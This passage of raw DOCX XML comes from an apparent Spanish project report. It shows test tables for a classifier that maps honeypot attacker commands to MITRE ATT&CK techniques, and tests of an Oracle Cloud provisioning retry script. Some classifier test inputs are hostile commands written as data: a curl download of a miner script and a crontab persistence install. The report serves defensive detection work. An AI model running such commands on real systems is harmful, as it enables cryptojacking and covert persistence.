              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Solo T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">pidof sshd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Que contenga «id» y cuente como T1033</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Solo T1057</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">crontab -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Que listar tareas cuente como persistencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ninguna propia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(crontab -l; echo '...') | crontab -</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Que no se detecte la instalación de la tarea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl http://.../miner.sh -o /tmp/miner.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Que solo se detecte la descarga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1105 y T1496.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">echo hidden / cat /tmp/window.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Coincidencias parciales («id», «w»)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ninguna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 12. Casos de prueba del clasificador con riesgo de error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los 33 casos se clasificaron correctamente. A continuación se ejecutó el analizador completo sobre las 500 sesiones simuladas: identificó 15 técnicas pertenecientes a 8 tácticas, y solo tres comandos quedaron sin técnica propia (cd /tmp, crontab -l y la ejecución directa de /tmp/bot), que efectivamente no corresponden a ninguna técnica distinta de la ejecución en shell. La Figura 4 muestra la gráfica generada. Debe interpretarse solo como validación del funcionamiento, ya que los datos son sintéticos; los resultados reales se presentarán en el informe de inteligencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK en los datos simulados (sesiones por técnica)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762500" cy="33051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3305175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de la Herramienta de Aprovisionamiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script oci_a1_retry.py no puede probarse de forma controlada contra Oracle, ya que el éxito depende de que haya capacidad libre. Se probó sustituyendo los clientes del SDK por objetos simulados que devuelven respuestas preparadas, una técnica habitual en pruebas unitarias, y levantando un servidor HTTP local que hace las veces de ntfy y registra las notificaciones recibidas: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16"/>
        <w:gridCol w:w="3016"/>
        <w:gridCol w:w="1905"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario simulado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comportamiento esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dos respuestas «Out of host capacity»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reintentar cada 60 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correcto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Respuesta 429 TooManyRequests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Duplicar la espera a 120 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correcto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Éxito en el cuarto intento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mostrar IP y enviar aviso urgente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correcto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Imágenes completa y mínima disponibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Elegir la completa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correcto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Error 400 LimitExceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detenerse con código 1 y avisar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correcto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Servidor de notificaciones caído</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Registrar el fallo y continuar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1200"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Correcto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 13. Pruebas del script de aprovisionamiento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script se ejecutó contra la cuenta real del proyecto los días 3 y 4 de octubre de 2026. Las peticiones confirmaron que la autenticación con la clave de API, el descubrimiento de recursos y el tratamiento del error de capacidad funcionan contra la API real, aunque en más de 600 intentos Oracle no llegó a tener capacidad disponible, lo que motivó el cambio de proveedor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
